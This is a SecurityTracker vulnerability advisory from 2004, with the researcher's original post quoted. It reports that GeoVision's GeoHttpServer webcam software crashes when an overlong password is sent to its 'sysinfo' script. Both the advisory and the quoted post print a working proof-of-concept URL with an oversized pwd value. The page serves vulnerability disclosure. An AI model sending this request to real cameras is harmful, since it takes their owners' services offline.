SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   GeoHttpServer Vendors:   GeoVision Inc.
GeoHttpServer Can Be Crashed By a Remote User Sending a Long Password
SecurityTracker Alert ID:  1008807
SecurityTracker URL:  http://securitytracker.com/id/1008807
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 21 2004
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   Rafel Ivgi (The-Insider) reported a vulnerability in the GeoHttpServer for GeoVision cameras. A remote user can cause the target web service to crash.

It is reported that the 'sysinfo' script does not properly validate user-supplied password information. A remote user can send a long password value to the target system to cause the system to crash.

A demonstration exploit URL is provided:

http://[target]/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

Impact:   A remote user can cause the target system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.geovision.com.tw/ (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  GeoHttpServer[webcam] D.O.S(Denial Of Service) Vulnerability


GeoHttpServer[webcam] D.O.S(Denial Of Service) Vulnerability

Vendor: GEOVISION INC
http://www.geovision.com.tw

Discovered by Rafel Ivgi, The-Insider.
http://theinsider.deep-ice.com

The GeoHttpServer Security is pretty good. The java they made
login is very stable. After a short exploration of their server
HTML'S i discovered that the remote "server information" admin
login form is being sent to http://<GeoHttpServerhost>/sysinfo.
Just like a lot of similar web servers, their problem is the
password string length and the server doesn't check the referrer(the page/IP
the data was sent from).


P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa

"Things that are unlikeable, are NOT impossible."
"A vulnerability doesn't exist, until you expose it."



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC